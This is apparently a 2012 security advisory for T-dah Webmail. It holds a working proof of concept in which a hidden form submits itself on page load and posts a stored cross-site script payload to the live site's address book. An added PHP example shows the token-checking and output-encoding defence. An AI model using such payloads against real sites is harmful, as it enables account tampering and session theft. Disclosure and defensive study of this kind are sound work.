T-dah Webmail CSRF & Stored XSS Exploit

Summary

T-dah Webmail suffers from CSRF and stored XSS vulnerabilities.

Credit:

The information has been provided by Yakir Wizman.


Details

Vulnerable Systems:
 * T-dah Webmail

<html>
<head>
<title>Tdah Webmail – CSRF & XSS Attack</title>
</head>
<body>
<!-- Hidden form targeting the address book "add" action; the request carries no anti-CSRF token -->
<form name='csrf' method='post' action='http://mail.tdah.us/addressbook.php'>
<input type='hidden' name='lid' value='English' />
<input type='hidden' name='tid' value='default' />
<input type='hidden' name='id' value='' />
<input type='hidden' name='opt' value='add' />
<!-- The name field holds the script payload that the address book stores -->
<input type='hidden' name='name' value='<script>alert(document.cookie);</script>' />
<input type='hidden' name='email' value='test@test.com' />
<input type='hidden' name='cell' value='' />
<input type='hidden' name='phone' value='' />
<input type='hidden' name='street' value='' />
<input type='hidden' name='apt' value='' />
<input type='hidden' name='city' value='' />
<input type='hidden' name='state' value='' />
<input type='hidden' name='zip' value='' />
<input type='hidden' name='country' value='' />
<input type='hidden' name='work' value='' />
<input type='hidden' name='wemail' value='' />
<input type='hidden' name='wphone' value='' />
<input type='hidden' name='wfax' value='' />
<input type='hidden' name='wstreet' value='' />
<input type='hidden' name='wcity' value='' />
<input type='hidden' name='wstate' value='' />
<input type='hidden' name='wzip' value='' />
<input type='hidden' name='aemail' value='' />
<input type='hidden' name='bday' value='' />
<input type='hidden' name='anniv' value='' />
<input type='hidden' name='aim' value='' />
<input type='hidden' name='icq' value='' />
<input type='hidden' name='msn' value='' />
<input type='hidden' name='yahoo' value='' />
<input type='hidden' name='google' value='' />
<input type='hidden' name='website' value='' />
<input type='hidden' name='picturename' value='' />
<input type='hidden' name='picturepath' value='' />
<input type='hidden' name='textnotes' value='' />
</form>
<!-- Submit automatically when the page loads -->
<script type='text/javascript'>
document.csrf.submit();
</script>
</body>
</html>
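
A defensive counterpart to the proof of concept above, added here as an example and not taken from T-dah's code: a PHP handler that refuses the add request unless it carries a per-session token, and HTML-encodes the stored name whenever it is rendered. The function names, the csrf_token field and the in-memory session and store arrays are assumptions made for illustration.

```php
<?php
// Added example, not T-dah code. All names below are hypothetical.

// Issue a per-session token to embed as a hidden field in the legitimate form.
function issue_csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state-changing POST only if it carries the session's token.
// hash_equals() compares in constant time.
function is_request_authentic(array $session, array $post): bool {
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied);
}

// Encode stored contact data for the HTML context every time it is rendered.
function render_contact_name(string $name): string {
    return htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Returns an HTTP-style status code; stores the contact only when authentic.
function handle_add_contact(array $session, array $post, array &$store): int {
    if (($post['opt'] ?? '') !== 'add') {
        return 400;
    }
    if (!is_request_authentic($session, $post)) {
        return 403;
    }
    $store[] = [
        'name'  => (string)($post['name'] ?? ''),
        'email' => (string)($post['email'] ?? ''),
    ];
    return 200;
}

// Constructed sample input mirroring the fields posted by the advisory's form.
$session = [];
$store = [];
$token = issue_csrf_token($session);
$forged = ['opt' => 'add', 'name' => '<script>alert(document.cookie);</script>',
           'email' => 'test@test.com'];
echo handle_add_contact($session, $forged, $store), "\n"; // cross-site request, no token
$legit = $forged + ['csrf_token' => $token];
echo handle_add_contact($session, $legit, $store), "\n";  // same fields with the token
echo render_contact_name($store[0]['name']), "\n";        // name encoded for display
```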

Disclosure Timeline:
Published: 2012-08-20
